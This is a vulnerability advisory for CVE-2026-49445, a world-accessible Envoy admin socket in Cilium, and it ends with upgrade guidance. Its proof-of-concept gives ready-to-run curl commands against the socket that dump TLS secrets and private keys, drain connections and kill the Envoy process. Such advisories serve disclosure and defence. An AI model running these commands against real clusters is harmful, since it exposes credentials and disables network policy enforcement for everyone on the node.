critical · 9.2CVE-2026-49445Jul 6, 2026

CVE-2026-49445: Cilium Envoy Admin Socket World-Accessible Permission Misconfiguration

Shubham Kandhare
Security Engagement Manager, SecureLayer7

When Cilium L7 policies are active, the Envoy admin Unix socket is created with world-accessible permissions, letting any local user on the node read TLS secrets, drain connections, or kill the Envoy

Packagegithub.com/cilium/cilium
Ecosystemgo
Affected>= 1.19.0, < 1.19.2
Fixed in1.19.2

The problem

Cilium starts an Envoy proxy to enforce L7 network policies. The admin Unix socket for that proxy is created with overly permissive filesystem permissions, making it readable and writable by any process on the node.

A local attacker (or a compromised workload with node access) can connect directly to the socket and call any Envoy admin endpoint. This includes dumping TLS certificates and private key material, manipulating traffic, or terminating the Envoy process and breaking all L7 policy enforcement across the node.

Proof of concept

A working proof-of-concept for CVE-2026-49445 in github.com/cilium/cilium, with the exact payload below.

bash
# Step 1: locate the world-accessible admin socket on the node
ls -la /var/run/cilium/envoy/
# srwxrwxrwx  admin.sock  <-- permissions should be 0700, are 0777

# Step 2: dump Envoy config (exposes TLS secrets, upstream clusters, certs)
curl -s --unix-socket /var/run/cilium/envoy/admin.sock \
  http://localhost/config_dump

# Step 3: disrupt traffic -- drain all connections
curl -s --unix-socket /var/run/cilium/envoy/admin.sock \
  -X POST http://localhost/drain_listeners

# Step 4: terminate the Envoy process (kills all L7 policy enforcement on node)
curl -s --unix-socket /var/run/cilium/envoy/admin.sock \
  -X POST http://localhost/quitquitquit

The Envoy admin socket at /var/run/cilium/envoy/admin.sock was created with world-accessible permissions (mode 0777). No authentication or authorization is required on Envoy admin endpoints, so any local OS user or breakout container that can reach the socket has full admin control.

PR #44512 ("envoy: remove world access to admin socket") corrects the socket directory and file permissions so that only the owning process (the Cilium agent or cilium-envoy DaemonSet) can connect. This maps to CWE-732 (Incorrect Permission Assignment for Critical Resource) and the advisory-listed CWE-862 (Missing Authorization), because the authorization boundary relied entirely on filesystem permissions that were never enforced.

The fix

Upgrade to Cilium v1.19.2, v1.18.8, or v1.17.14. All three releases include the fix from PR #44512 which restricts the Envoy admin socket to owner-only permissions. No workaround exists for unpatched versions.

Reported by moemen.

References: [1][2][3]

Related research